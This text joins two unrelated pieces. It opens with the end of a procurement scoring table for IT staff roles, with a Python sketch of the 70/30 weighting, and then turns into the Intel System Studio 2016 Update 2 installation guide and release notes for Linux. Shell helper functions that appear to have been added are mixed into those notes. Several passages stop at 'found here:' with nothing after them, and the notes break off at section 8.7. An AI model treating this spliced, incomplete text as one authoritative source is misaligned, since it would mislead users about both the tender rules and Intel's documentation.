- Certification is available - 10 points. | 10 |
| 3.6.3 | Elastic Certified Engineer Certification:
- No Certification - 0 points;
- Certification is available - 10 points. | 10 |
| 3.6.4 | Experience in Application Development:
- 3 years – 14 points;
- Each additional year – plus 2 points
- Maximum – 20 points | 20 |
| **Total Section 3.6** | **55** |
| 3.7 | **System Administrator (1 person):** |
| 3.7.1 | Higher education in IT, Engineering, or Related Fields:
- Bachelor degree- 10.5 points;
- Master’s degree - 13 points;
- PhD and/or graduate school - 15 points. | 15 |
| 3.7.2 | Certification in Linux-like Operating Systems Administration (Linux 7 version or higher):
- No certification - 0 points;
- Certification is available - 5 points. | 5 |
| 3.7.3 | Certification in Application Server Administration:
• No certification - 0 points;
• Certification is available - 5 points. | 5 |
| 3.7.4 | Certification in Enterprise DB PostgreSQL Relational Database Administration:
• No certification - 0 points;
• Certification is available - 5 points. | 5 |
| 3.7.5 | Certification in Kubernetes Administration:
• No certification - 0 points;
• Certification is available - 5 points. | 5 |
| 3.7.6 | Experience in System Administration:
• 3 years - 14 points;
• Each additional year - plus 2 points
• Maximum - 20 points | 20 |
| | Total Section 3.7 | 55 |
| 3.8 | **Administrator (1 person):** |
| 3.8.1 | Higher Education in IT, Engineering, or Related Fields:
• Bachelor Degree – 10.5 points;
• Master’s Degree - 13 points;
• PhD and/or Graduate School - 15 points. | 15 |
| 3.8.2 | Experience in system administration:
• 3 years – 14 points;
• Each additional year - plus 2 points
• Maximum - 20 points | 20 |
| | Total Section 3.8 | 35 |
| | Total Section 3 | 420 |
| | Total technical score | 700 |
| Financial score (Lowest Offer / Offer × 30) | 30% |
| Total Score | Technical score (70%) + Financial score (30%) |
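The weighting above can be sketched end to end (the function names and the sample offer prices are illustrative, not from the TOR):

```python
def technical_weighted(tech_points, max_points=700, weight=70.0):
    """Scale raw technical points (maximum 700) to the 70% share."""
    return tech_points / max_points * weight

def financial_weighted(lowest_offer, offer, weight=30.0):
    """The lowest compliant offer takes the full 30%; others score pro-rata."""
    return lowest_offer / offer * weight

def total_score(tech_points, lowest_offer, offer, passing=490):
    """Combined score; bids below 490 technical points (70% of 700)
    are not financially evaluated."""
    if tech_points < passing:
        return None
    return technical_weighted(tech_points) + financial_weighted(lowest_offer, offer)

# A bid scoring 560 technical points, priced at 100,000 against a
# lowest offer of 90,000 (hypothetical figures):
score = total_score(560, 90_000, 100_000)
```

Note that the section maxima are consistent: 140 + 140 + 420 = 700 technical points, so the technical share scales cleanly to 70%.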
# Intel® System Studio 2016 Update 2
## Installation Guide and Release Notes
Installation Guide and Release Notes for Linux* Host
5 February 2016
## Contents
1. Introduction
2. What's New
   2.1 Versions History
3. Intel® Software Manager
4. Product Contents
5. Getting Started
6. Technical Support and Documentation
   6.1 Release / Installation Notes and User Guides Location
   6.2 Article & Whitepaper Locations
   6.3 Support
   6.4 Support for native code generation for Intel® Graphics Technology
7. System Requirements
   7.1 Supported Host Platforms
   7.2 Eclipse* Integration Prerequisites
   7.3 Host Prerequisites and Resource Requirements
       7.3.1 Host Space Requirements by Component
       7.3.2 Intel® Integrated Performance Primitives (Intel® IPP) Details
       7.3.3 Intel® C++ Compiler
   7.4 Target Software Requirements
   7.5 Target Prerequisites and Resource Requirements
       7.5.1 Target Space Requirement by Component
       7.5.2 Intel® VTune™ Amplifier target OS kernel configuration
       7.5.3 Intel® VTune™ Amplifier Feature vs. Resource Matrix
   7.6 Hardware Requirements
   7.7 Intel® Graphics Technology development specific requirements
8. Installation Notes
   8.1 Installing the Tool Suite
   8.2 Product Installation (Online Installer)
   8.3 Product Installation (Full Package Offline Installer)
   8.4 Activating the Product
   8.5 Default / Customized Installation
   8.6 Uninstalling the Tool Suite
   8.7 Installation directory structure
   8.8 Development target package installation
       8.8.1 Intel® Inspector Command line interface installation
       8.8.2 Preparing a Target Android* System for Remote Analysis
       8.8.3 Intel® VTune™ Amplifier Collectors Installation on Remote Linux* Systems
       8.8.4 Intel® VTune™ Amplifier Sampling Enabling Product Installation on Remote Linux* Systems
       8.8.5 Intel® Integrated Performance Primitives redistributable shared object installation
       8.8.6 Intel® Math Kernel Library redistributable shared object installation
       8.8.7 Intel® C++ Compiler dynamic runtime library installation
   8.9 Eclipse* IDE Integration
       8.9.1 Installation
       8.9.2 Launching Eclipse for Development with the Intel C++ Compiler
       8.9.3 Editing Compiler Cross-Build Environment Files
       8.9.4 Cheat Sheets
       8.9.5 Integrating the Intel® System Debugger into Eclipse*
   8.10 Wind River* Workbench* IDE Integration
       8.10.1 Documentation
       8.10.2 Installation
       8.10.3 Manual installation
       8.10.4 Uninstall
   8.11 Installing Intel® XDP3 JTAG Probe
   8.12 Ordering JTAG Probe for the Intel® System Debugger
9. Issues and Limitations
   9.1 General Issues and Limitations
       9.1.1 Use non-RPM installation mode with Wind River* Linux* 5 and 6
       9.1.2 Intel® Software Manager unsupported on Wind River* Linux* 5.0 and Ubuntu* 12.04
       9.1.3 Installation into non-default directory on Fedora* 19 may lead to failures
       9.1.4 Running online-installer behind proxy server fails
       9.1.5 The online-installer has to be run with sudo or root access
       9.1.6 Some hyperlinks in HTML documents may not work when you use Internet Explorer
   9.2 Wind River* Linux* 7 Support
       9.2.1 Windows* host is currently not supported for Wind River* Linux* 7 targeted development
       9.2.2 No integration into Wind River* Workbench* IDE is currently available for Wind River* Linux* 7 target
       9.2.3 Remote event-based sampling with Intel® VTune™ Amplifier Limitations
   9.3 Intel® Energy Profiler
       9.3.1 /boot/config-`uname -r` file must be present on platform
       9.3.2 Power and Frequency Analysis support for Intel® Atom™ Processor covers Android* OS only
   9.4 Intel® VTune™ Amplifier Usage with Yocto Project*
       9.4.1 Building Sampling Collector (SEP) for Intel® VTune™ Amplifier driver on host Linux* system
       9.4.2 Remote Intel® VTune™ Amplifier Sampling on Intel® 64 Yocto Project* Builds
       9.4.3 Building 64-bit Sampling Collector against Yocto Project* targeting Intel® Atom™ Processor E38xx requires additional build flags
   9.5 Intel® System Studio System Analyzer
       9.5.1 Supported Linux* Distributions
       9.5.2 The path for the Intel® System Studio System Analyzer does not get set up automatically
       9.5.3 Support for Intel® Atom™ Processor Z3560 and Z3580 code-named “Moorefield” missing
   9.6 Intel® System Debugger
       9.6.1 Intel® Puma™ 6 Media Gateway Firmware Recovery Tool not available
       9.6.2 Connecting to Intel® Quark™ SoC may trigger error message that can be ignored
       9.6.3 Using the symbol browser on large data sets and large symbol info files not recommended
       9.6.4 Limited support for Dwarf Version 4 symbol information
   9.7 GDB* - GNU* Project Debugger
       9.7.1 Eclipse* integration of GDB* requires Intel® C++ Compiler install
   9.8 Intel® C++ Compiler
       9.8.1 “libgcc_s.so.1” should be installed on the target system
10. Attributions
11. Disclaimer and Legal Information
1 Introduction
This document provides a brief overview of the Intel® System Studio 2016 and provides pointers to where you can find additional product information, technical support, articles and whitepapers.
It also explains how to install the Intel® System Studio product. Installation is a multi-step process and may contain components for the development host and the development target. Please read this document in its entirety before beginning and follow the steps in sequence.
The Intel® System Studio consists of multiple components for developing, debugging, tuning and deploying system and application code targeted towards embedded, Intelligent Systems, Internet of Things and mobile designs.
The tool suite covers several different use cases targeting development for embedded intelligent system platforms ranging from Intel® Atom™ Processor based low-power embedded platforms to 3rd, 4th, 5th and 6th generation Intel® Core™ microarchitecture based designs. Please refer to the Intel® System Studio User's Guide for guidance on how to apply Intel® System Studio to the various use case scenarios that are available with this versatile product.
Due to the nature of this comprehensive integrated software development tools solution, different Intel® System Studio components may be covered by different licenses. Please see the licenses included in the distribution as well as the Disclaimer and Legal Information section of these release notes for details.
Optimization Notice
Intel’s compilers may or may not optimize to the same degree for non-Intel microprocessors for optimizations that are not unique to Intel microprocessors. These optimizations include SSE2, SSE3, and SSSE3 instruction sets and other optimizations. Intel does not guarantee the availability, functionality, or effectiveness of any optimizations on microprocessors not manufactured by Intel. Microprocessor-dependent optimizations in this product are intended for use with Intel microprocessors. Certain optimizations not specific to Intel microarchitecture are reserved for Intel microprocessors. Please refer to the applicable User and Reference Guides for more information regarding the specific instruction sets covered by this notice.
Notice revision #20110804
2 What's New
This section highlights important changes in the actual product release.
More detailed information about new features and changes can be found in the respective product release notes (see also section 6.1, “Release / Installation Notes and User Guides Location”).
Intel® System Studio 2016 Update 2
1. Intel® C++ Compiler:
- Intrinsic for the Short Vector Random Number Generator (SVRNG) Library
- The Short Vector Random Number Generator (SVRNG) library provides intrinsics for the IA-32 and Intel® 64 architectures running on supported operating systems. The SVRNG library partially covers both standard C++ and the random number generation functionality of the Intel® Math Kernel Library (Intel® MKL). Complete documentation may be found in the Intel® C++ Compiler 16.0 User and Reference Guide.
- Intel® SIMD Data Layout Templates (Intel® SDLT)
- Intel® SDLT is a library that helps you leverage SIMD hardware and compilers without having to be a SIMD vectorization expert.
- Intel® SDLT can be used with any compiler supporting ISO C++11, Intel® Cilk™ Plus SIMD extensions, and #pragma ivdep
- New C++14 and C11 features supported
- And many others ... For a full list of new features please refer to the Composer Edition product release notes
2. Intel® Math Kernel Library (Intel® MKL)
- Introduced the mkl_finalize function to facilitate usage models in which Intel MKL dynamic libraries, or third-party dynamic libraries statically linked with Intel MKL, are loaded and unloaded explicitly
- Introduced sorting algorithm
- Performance improvements for BLAS, LAPACK, ScaLAPACK, Sparse BLAS
- Several new features for Intel MKL PARDISO
- Added Intel® TBB threading support for all BLAS level-1 functions, and OpenMP* threading for some of them.
3. Intel® Performance Primitives (Intel® IPP)
- Image Processing:
  - Added the contiguous volume format (C1V) support to the following 3D data processing functions: ipprWarpAffine, ipprRemap, and ipprFilter.
  - Added the ippiFilterBorderSetMode function to support high accuracy rounding mode in ippiFilterBorder.
  - Added the ippiCopyMirrorBorder function for copying the image values by adding the mirror border pixels.
  - Added mirror border support to the following filtering functions: ippiFilterBilateral, ippiFilterBoxBorder, ippiFilterBorder, ippiFilterSobel, and ippiFilterScharr.
  - Kernel coefficients in the ippiFilterBorder image filtering functions are used in direct order, which is different from the ippiFilter functions in the previous releases.
**Computer Vision:**
- Added 32-bit floating point input data support to the ippiSegmentWatershed function.
- Added mirror border support to the following filtering functions: ippiFilterGaussianBorder, ippiFilterLaplacianBorder, ippiMinEigenVal, ippiHarrisCorner, ippiPyramidLayerDown, and ippiPyramidLayerUp.
**Signal Processing:**
- Added the ippsThreshold_LTAbsVal function, which uses the vector absolute value.
- Added the ippsIIRIIR64f functions to perform zero-phase digital IIR filtering.
**The multi-threaded libraries only depend on the Intel® OpenMP* libraries; their dependencies on the other Intel® Compiler runtime libraries were removed.**
4. Intel® System Debugger:
- Unified installer now for all components of the Intel® System Debugger (for system debug, system trace and WinDbg* extension)
- Support for Eclipse* 4.4 (Luna) integration with Intel® Trace Viewer
- New ‘Trace Profiles’ feature for System Trace Viewer to configure the destination for streaming mode for:
- BIOS Reserved Trace Memory
- Intel® Trace Hub Memory
- Streaming to DCI-Closed Chassis Adapter (BSSB CCA)
- Tracing to memory support (Intel® Trace Hub or system DRAM memory) for 6th Gen Intel® Core™ processors (PCH) via Intel® XDP3 JTAG probe.
- Trace Viewer improvements: Event distribution viewer. New progress bar when stopping a trace to memory. Rules are saved now in Eclipse workspace and restored during Eclipse restart. Improved memory download with wrapping enabled.
- Debugging support for Intel® Xeon® Processor D-1500 Product Family on the Grangeville platform.
- System Debugger improvements: Export memory window to text file.
5. Intel® Graphics Performance Analyzer (Intel® GPA)
- Added support for 32-bit and 64-bit applications on Android M (6.0, Marshmallow).
- Intel Graphics Performance Analyzers are now in a single package for Windows users.
- Added support for OS X 10.11 El Capitan.
- Implemented texture storage parameters modification experiment - you can now change dimensions and sample count parameters for input textures without recompiling your app.
- Can now export textures in KTX/DDS/PNG file formats.
- And much more….
View the full release notes for more details.
6. Intel® VTune™ Amplifier for Systems
- Added support for Ubuntu* 14.04.3 for Intel® Energy Profiler (SoC Watch 2.1.1)
- Support for the ITT Counters API used to observe user-defined global characteristic counters that are unknown to the VTune Amplifier
- Support for the Load Module API used to analyze code that is loaded in an alternate location that is not accessible by the VTune Amplifier
- Option to limit the collected data size by setting a timer to save tracing data only for the specified last seconds of the data collection added for hardware event-based sampling analysis types
- New Arbitrary Targets group added to create command line configurations to be launched from a different host. This option is especially useful for microarchitecture analysis since it provides easy access to the hardware events available on a platform you choose for configuration.
- Source/Assembly analysis available for OpenCL™ kernels (with no metrics data)
- SGX Hotspots analysis support for identifying hotspots inside security enclaves for systems with the Intel Software Guard Extensions (Intel SGX) feature enabled
- Metric-based navigation between call stack types replacing the former Data of Interest selection
- Updated filter bar options, including the selection of a filtering metric used to calculate the contribution of the selected program unit (module, thread, and so on)
- DRAM Bandwidth overtime and histogram data is scaled according to the maximum achievable DRAM bandwidth
7. Intel® Inspector
- Support for Fedora 23 and Ubuntu 15.10.
2.1 Version History
This section highlights important changes in previous Intel® System Studio 2016 product versions.
Intel® System Studio 2016 Update 1
1. Intel® C++ Compiler:
• Enhancements for offloading to Intel® Graphics Technology
2. Intel® Energy Profiler (SoC Watch):
• Added support for collection of gfx-cstate and ddr-bw metrics on platforms based on Intel® Core™ architecture.
3. Intel® System Debugger:
• New options for the debugger’s “Restart” command
• System Trace Viewer:
o New “Event Distribution View” feature
o Several improvements in the Trace Viewer GUI.
3 Intel® Software Manager
The Intel® Software Manager, automatically installed with the Intel® System Studio product, is a Windows System Tray application to provide a simplified delivery mechanism for product updates, current license status and news on all installed Intel software products.
You can also volunteer to provide Intel anonymous usage information about these products to help guide future product design. This option, the Intel® Software Improvement Program, is not enabled by default – you can opt-in during installation or at a later time, and may opt-out at any time. For more information please see http://intel.ly/SoftwareImprovementProgram.
4 Product Contents
The product contains the following components:
1. Intel® C++ Compiler 16.0 Update 2
2. Intel® Integrated Performance Primitives 9.0 Update 2
3. Intel® Math Kernel Library 11.3 Update 2 for Linux®
4. Intel® Threading Building Blocks 4.4 Update 3
5. Intel® System Debugger 2016
5.1. Intel® System Debugger notification module xdbntf.ko (Provided under GNU General Public License v2)
6. OpenOCD 0.8.0 library (Provided under GNU General Public License v2+) (64-bit host only)
6.1. OpenOCD 0.8.0 source (Provided under GNU General Public License v2+)
7. GNU® GDB 7.8.1 (Provided under GNU General Public License v3) (64-bit host only)
7.1. Source of GNU® GDB 7.8.1 (Provided under GNU General Public License v3)
8. Intel® VTune™ Amplifier 2016 Update 2 for Systems with Intel® Energy Profiler
9. Intel® Inspector 2016 for Systems
10. Intel® Graphics Performance Analyzers 2015 R4
5 Getting Started
Please refer to the Getting Started Guide and Intel® System Studio User's Guide for guidance on Intel® System Studio use cases and supported usage models.
Intel® System Studio User's Guide
• <install-dir>/documentation_2016/en/iss2016/iss_ug.pdf
Intel® System Studio Getting Started Guide
• <install-dir>/documentation_2016/en/iss2016/iss_gsg_lin.htm
6 Technical Support and Documentation
6.1 Release / Installation Notes and User Guides Location
The release notes and getting started guides for the tool components that make up the Intel® System Studio product can be found at the following locations after unpacking system_studio_2016.2.xxx.tgz and running the install.sh installation script, or after running the online installer system_studio_2016.2.xxx_online.sh.
The paths are given relative to the installation directory <install-dir>. The default installation directory is /opt/intel for (sudo)root installations and the user home directory ($HOME)/intel for user installations unless indicated differently.
Intel® System Studio Release Notes and Installation Guide
Intel® C++ Compiler
- <install-dir>/documentation_2016/en/compiler_c/iss2016/l_a_compiler_get_started.htm
GNU* GDB / Intel® Debugger for Heterogeneous Compute
- <install-dir>/documentation_2016/en/debugger/iss2016/gdb/get_started.htm
Intel® Integrated Performance Primitives
- <install-dir>/documentation_2016/en/ipp/common/get_started.htm
Intel® Math Kernel Library
- <install-dir>/documentation_2016/en/mkl/iss2016/get_started.htm
Intel® Threading Building Blocks
- <install-dir>/documentation_2016/en/tbb/common/get_started.htm
Intel® System Debugger
**Intel® VTune™ Amplifier for Systems**
**Intel® Inspector for Systems**
• `<install-dir>/inspector_2016_for_systems/documentation/en/welcomepage/get_started.htm`
**Intel® Graphics Performance Analyzers (Intel® GPA)**
Release Notes of the latest Intel® GPA 2015 R4 release can be found at:
Documentation of the Intel® GPA is available at:
**Intel® System Studio - Target User Documentation**
After unpacking the `<install-dir>/system_studio_2016.2.xxx/targets/system_studio_target.tgz` package you can find several documents describing how to set up target systems for operation:
• A user’s guide for WuWatch for Android* targets:
../system_studio_target/wuwatch_android/WakeUpWatchForAndroid.pdf
• User guides for SoCWatch for Android* and Linux* targets:
../system_studio_target/socwatch_linux_v2.1/SoCWatchForLinux.pdf
../system_studio_target/socwatch_android_vx.x.x/SoCWatchForAndroid_vx_x_x.pdf
• Release Notes for Inspector for Linux* target:
• ../../../system_studio_target/inspector_2016_for_systems/documentation/Release_Notes_Inspector_Linux.pdf
6.2 Article & Whitepaper Locations
Intel® System Studio Tutorials and Samples
• <install-dir>/documentation_2016/en/iss2016/samples-and-tutorials.html
Intel® System Studio Articles and Whitepapers
• https://software.intel.com/en-us/articles/intel-system-studio-articles
• For a list of all available articles, whitepapers and related resources please visit the Intel® System Studio product page at http://software.intel.com/en-us/intel-system-studio and look at the Support tab.
6.3 Support
If you did not register your compiler during installation, please do so at the Intel® Software Development Products Registration Center. Registration entitles you to free technical support, product updates and upgrades for the duration of the support term.
To submit issues related to this product please visit the Intel Premier Support webpage and submit issues under the product Intel(R) System Studio.
Additionally you may submit questions and browse issues in the Intel® System Studio User Forum.
Note: If your distributor provides technical support for this product, please contact them for support rather than Intel.
6.4 Support for native code generation for Intel® Graphics Technology
By default, the compiler will generate virtual ISA code for the kernels to be offloaded to Intel® Graphics Technology. The vISA is target independent and will run on processors that have the Intel graphics processor integrated on the platform and that have the proper Intel® HD Graphics driver installed. The Intel HD Graphics driver contains the offload runtime support and a Jitter (just-in-time compiler) that will translate the virtual ISA to the native ISA at runtime for the platform on which the application runs and do the offload to the processor graphics. The Jitter
gets the current processor graphics information at runtime. The new feature allows generation of native ISA at link time by using the option `--mgpuarch=<arch>`. The option is described in detail in the User's Guide.
7 System Requirements
7.1 Supported Host Platforms
One of the following Linux* distributions is required on the host (this is the list of distributions supported by all components; other distributions may or may not work and are not recommended; please refer to Technical Support if you have questions).
In most cases Intel® System Studio 2016 will install and work on a standard Linux* OS distribution based on current Linux* kernel versions without problems, even if they are not listed below. You will, however, receive a warning during installation for Linux* distributions that are not listed.
- Red Hat Enterprise* Linux* 6, 7
- Ubuntu* 10.04 LTS, 12.04 LTS, 14.04 LTS, 15.04 LTS
- Fedora* 20
- Wind River* Linux* 5, 6
- openSUSE* 12.1
- SUSE LINUX Enterprise Server* 11 SP2, 12
Individual Intel® System Studio 2016 components may support additional distributions. See the individual component’s release notes after you unpack and run the installer for the tool suite distribution
> tar -zxvf system_studio_2016.2.xxx.tgz
for details.
Sudo or Root Access Right Requirements
- Integration of the Intel® C++ Compiler into a Yocto Project* Application Development Toolkit installed to /opt/poky/ requires the launch of the tool suite installation script install.sh as root or sudo user.
- Installation of the hardware drivers for the Intel® ITP-XDP3 probe to be used with the Intel® System Debugger requires the launch of the tool suite installation script install.sh as root or sudo user.
Environment Setup
To setup the environment for the Intel® C++ Compiler and integrate it correctly with the build environment on your Linux host, execute the following command:
> source <install-dir>/bin/compilervars.sh [-arch <arch>] [-platform <platform>]
where
<arch> can be one of:
ia32: Compilers and libraries for IA32 architectures only
intel64: Compilers and libraries for Intel® 64 architectures only
<platform> can be either linux or android.
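The setup step above can be scripted; the following is a minimal sketch, assuming the `/opt/intel` default prefix of a sudo/root installation (the `setup_iss_env` wrapper itself is hypothetical, only the `compilervars.sh` invocation comes from these notes):

```shell
# setup_iss_env: source compilervars.sh from a given install prefix.
# The default prefix /opt/intel matches a sudo/root installation.
setup_iss_env() {
    prefix="${1:-/opt/intel}"
    script="$prefix/bin/compilervars.sh"
    if [ -f "$script" ]; then
        # Configure the Intel 64 compiler environment for a Linux target.
        . "$script" -arch intel64 -platform linux
    else
        echo "compilervars.sh not found under $prefix" >&2
        return 1
    fi
}
```

For a user-mode installation the prefix would be `$HOME/intel` instead.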
7.2 Eclipse* Integration Prerequisites
When asked, point the installer to the installation directory of your Eclipse* install; usually this is /opt/eclipse/.
The prerequisites for successful Eclipse integration are:
1. Eclipse* 3.8 (Juno) – Eclipse* 4.5 (Mars)
2. Eclipse* CDT 8.0 – 8.3
3. Java Runtime Environment (JRE) version 6.0 (also called 1.6) update 11 or later.
7.3 Host Prerequisites and Resource Requirements
7.3.1 Host Space Requirements by Component
<table>
<thead>
<tr>
<th>Component</th>
<th>Minimum RAM</th>
<th>Recommended RAM</th>
<th>Disk Space</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intel® System Studio</td>
<td>2Gb</td>
<td>4Gb</td>
<td>7Gb</td>
</tr>
<tr>
<td>Intel® C++ Compiler</td>
<td>1Gb</td>
<td>2Gb</td>
<td>2.5Gb</td>
</tr>
<tr>
<td>Intel® Integrated Performance Primitives</td>
<td>1Gb</td>
<td>4Gb</td>
<td>1-2Gb</td>
</tr>
<tr>
<td>Intel® Math Kernel Library</td>
<td>1Gb</td>
<td>4Gb</td>
<td>2.3Gb</td>
</tr>
<tr>
<td>Intel® VTune™ Amplifier for Systems</td>
<td>2Gb</td>
<td>4Gb</td>
<td>650Mb</td>
</tr>
<tr>
<td>Intel® Inspector for Systems</td>
<td>2Gb</td>
<td>4Gb</td>
<td>350Mb</td>
</tr>
<tr>
<td>GDB</td>
<td>1Gb</td>
<td>2Gb</td>
<td>200Mb</td>
</tr>
<tr>
<td>Intel® System Debugger</td>
<td>1Gb</td>
<td>2Gb</td>
<td>300Mb</td>
</tr>
</tbody>
</table>
7.3.2 Intel® Integrated Performance Primitives (Intel® IPP) Details
Intel® Integrated Performance Primitives (Intel® IPP) for IA-32 Hardware Requirements:
- 1800MB of free hard disk space, plus an additional 400MB during installation for download and temporary files.
Intel® Integrated Performance Primitives (Intel® IPP) for Intel® 64 Hardware Requirements:
- 1900MB of free hard disk space, plus an additional 700MB during installation for download and temporary files.
### 7.3.3 Intel® C++ Compiler
Cross-build for Wind River Linux* target currently requires an existing Wind River Linux 4.x, 5.x, 6.x or 7.x installation that the compiler can integrate into.
### 7.4 Target Software Requirements
- Yocto Project* 1.4, 1.5, 1.6, 1.7, 1.8 based environment
- CE Linux* PR35 based environment
- Tizen* IVI 3.x
- Wind River Linux* 4, 5, 6, 7 based environment
- Android* 4.1.x through 5.1
**Note:**
The level of target OS support by a specific Intel® System Studio component may vary.
### 7.5 Target Prerequisites and Resource Requirements
#### 7.5.1 Target Space Requirement by Component
<table>
<thead>
<tr>
<th>Component</th>
<th>Minimum RAM</th>
<th>Dependencies</th>
<th>Disk Space</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intel® C++ Compiler</td>
<td>application</td>
<td>Linux* kernel 2.6.18 or newer; glibc-2.5 or compatible; libgcc-4.1.2 or compatible; libstdc++-3.4.7 or compatible</td>
<td>13Mb (IA-32)</td>
</tr>
<tr>
<td></td>
<td>dependent</td>
<td></td>
<td>15Mb (Intel® 64)</td>
</tr>
<tr>
<td>Intel® VTune™ Amplifier CLI (CLI)</td>
<td>4Gb</td>
<td>Specific kernel configuration reqs. Details below.</td>
<td>200Mb</td>
</tr>
<tr>
<td>Intel® VTune™ Amplifier SEP (SEP)</td>
<td>(# logical cores+2) Mb</td>
<td>specific kernel configuration reqs. Details below.</td>
<td>8Mb</td>
</tr>
<tr>
<td>SoC Watch</td>
<td>(# logical cores+2) Mb</td>
<td>Specific kernel configuration reqs. See SoCWatch documentation</td>
<td>8Mb</td>
</tr>
<tr>
<td>WakeUp Watch</td>
<td>(# logical cores+2) Mb</td>
<td>Specific kernel configuration reqs. See WuWatch documentation</td>
<td>8Mb</td>
</tr>
<tr>
<td>Intel® Inspector for Systems CLI</td>
<td>2Gb</td>
<td>4Gb</td>
<td>350Mb</td>
</tr>
</tbody>
</table>
### 7.5.2 Intel® VTune™ Amplifier target OS kernel configuration
For Intel® VTune™ Amplifier performance analysis and Intel® Energy Profiler there are minimum kernel configuration requirements. The settings below are required for different analysis features.
- For event-based sampling (EBS) sep3_x.ko and pax.ko require the following settings:
- CONFIG_PROFILING=y
- CONFIG_OPROFILE=m (or CONFIG_OPROFILE=y)
- CONFIG_HAVE_OPROFILE=y
- For EBS with callstack information vtsspp.ko additionally needs the following settings:
- CONFIG_MODULES=y
- CONFIG_SMP=y
- CONFIG_MODULE_UNLOAD=y
- CONFIG_KPROBES=y
- CONFIG_TRACEPOINTS=y (optional but recommended)
- For power analysis, required by apwr3_x.ko
- CONFIG_MODULES=y
- CONFIG_MODULE_UNLOAD=y
- CONFIG_TRACEPOINTS=y
- CONFIG_FRAME_POINTER=y
- CONFIG_COMPAT=y
- CONFIG_TIMER_STATS=y
- CONFIG_X86_ACPI_CPUFREQ=m (or CONFIG_X86_ACPI_CPUFREQ=y)
- CONFIG_INTEL_IDLE=y
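The requirements above can be verified against a target kernel before deploying the collectors. A sketch (the `check_kconfig` helper is made up; the option names are taken from the lists above) that scans a kernel config file such as `/boot/config-$(uname -r)`:

```shell
# check_kconfig: report whether each required kernel option is enabled
# (built in with =y or as a module with =m) in the given config file.
check_kconfig() {
    config="$1"; shift
    missing=0
    for opt in "$@"; do
        if grep -Eq "^${opt}=(y|m)$" "$config"; then
            echo "ok:      $opt"
        else
            echo "MISSING: $opt"
            missing=1
        fi
    done
    return "$missing"
}

# Example: verify the event-based sampling (EBS) requirements.
# check_kconfig "/boot/config-$(uname -r)" \
#     CONFIG_PROFILING CONFIG_OPROFILE CONFIG_HAVE_OPROFILE
```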
## 7.5.3 Intel® VTune™ Amplifier Feature vs. Resource Matrix
<table>
<thead>
<tr>
<th>Feature</th>
<th>Event based sampling (EBS) analysis</th>
<th>EBS analysis with stacks</th>
<th>Algorithmic analysis (PIN-based)</th>
<th>Intel Energy Profiler</th>
<th>Remote collection from host</th>
<th>Result view on target</th>
<th>Requirements:</th>
</tr>
</thead>
<tbody>
<tr>
<td>SEP</td>
<td>X</td>
<td></td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>~8 MB disk space (Number of logical cores +2) Mb RAM</td>
</tr>
<tr>
<td>amplxe-cl - target</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>~25 MB disk space ~64 Mb RAM</td>
</tr>
<tr>
<td>amplxe-cl</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>~200MB disk space >= 4Gb RAM</td>
</tr>
</tbody>
</table>
### 7.6 Hardware Requirements
- IA32 or Intel® 64 architecture based host computer
- Development platform based on the Intel® Atom™ processor Z5xx, N4xx, N5xx, D5xx, E6xx, N2xxx, D2xxx, E3xxx, Z2xxx, Z3xxx, C2xxx, or Intel® Atom™ processor CE4xxx, CE53xx and the Intel® Puma™ 6 Media Gateway
- Intel® Edison development platform
- Alternatively development platform based on 2nd, 3rd, 4th, 5th or 6th generation Intel® Core™ processor.
- Xeon® processors based on 2nd, 3rd, 4th or 5th generation Intel® Core™ architecture.
### 7.7 Intel® Graphics Technology development specific requirements
Up-to-date information on hardware, operating system and driver requirements for offloading computations to the integrated processor graphics can be found on the following page:
8 Installation Notes
8.1 Installing the Tool Suite
The installation process as well as prerequisites for using the different Intel® System Studio components are documented online and can be found here:
The default base installation, in the following referred to as <install-dir> directory is:
- For sudo/root installation: /opt/intel/
- For user mode installation: $HOME/intel/
Important Note: As indicated in the installation process, Intel® System Studio 2015 customers need to upgrade their license either by entering an Intel® System Studio 2016 serial number directly or by obtaining the new license file from Intel® Registration Center. More information on this can be found on the following page:
You have the choice to use the online installer which is a small agent that downloads installation packages according to the products you will choose for installation.
Alternatively you can use the full package offline installer which doesn’t require an Internet connection for installation.
8.2 Product Installation (Online Installer)
If you only intend to install a subset of the Intel® System Studio components, you can reduce the package size that is downloaded for the actual install. Using the online installer requires an Internet connection and that HTTPS-based component downloads are permitted by your firewall.
To install the product execute the downloaded online install script
> system_studio_2016.2.xxx_online.sh
following all instructions. During installation you have to activate your product with a serial number (xxxx-xxxxxxxx) or using a license file (.lic). See activation details under ch. 8.4.
8.3 Product Installation (Full Package Offline Installer)
Using the full package offline installer is suitable for systems where no Internet connection is available. You can perform a default installation (with a typical selection of components) or a custom installation where you configure your set of components to install.
The full package offline installer is available as a command line tool and a graphical installation Wizard.
To run the installer proceed as follows:
- Unpack the downloaded tool suite package in a directory to which you have write access.
> tar -zxvf system_studio_2016.2.xxx.tgz
- Change into the directory the tar file was extracted to
> cd ./system_studio_2016.2.xxx/
- Execute one of the installation scripts for command line installation or using the GUI installer.
>./install.sh
>./install_GUI.sh
following all instructions. During installation you have to activate your product with a serial number (xxxx-xxxxxxxx) or using a license file (.lic). See activation details under ch. 8.4.
8.4 Activating the Product
During installation of the Intel® System Studio 2016 Composer Edition an activation dialog pops up providing the following options
- **Use existing activation** (this option is visible when the product installer recognized an existing valid license on the system)
- **Activation with Serial Number**. ("Online Activation", requires Internet connection; the format of the serial number is: xxxx-xxxxxxxx)
- **Evaluation activation** (no serial number required; installs a 30-days license on the system with full functionality)
- **Use a license manager** (license manager must be running and accessible from the install machine)
- **Use license file** (license file .lic must be available on the install machine, no internet connection required)
The Intel® Software Manager (see section 3) can be used to manage your activations after product installation. It can for example convert an evaluation activation into a full product activation (after product license purchase) without re-installing the product.
8.5 Default / Customized Installation
When the Installation Summary dialog pops up, just click ‘Next’ for a default installation or the ‘Customize’ button to modify the list of components to install.
8.6 Uninstalling the Tool Suite
To uninstall the product, execute the following
- Change into the System Studio base directory
cd <install-dir>/system_studio_2016.2.xxx/
- Execute one of the uninstallation scripts on command line or using the GUI uninstaller.
./uninstall.sh
./uninstall_GUI.sh
You need to uninstall the product with the same rights (user, (sudo) root) as you used for product installation.
8.7 Installation directory structure
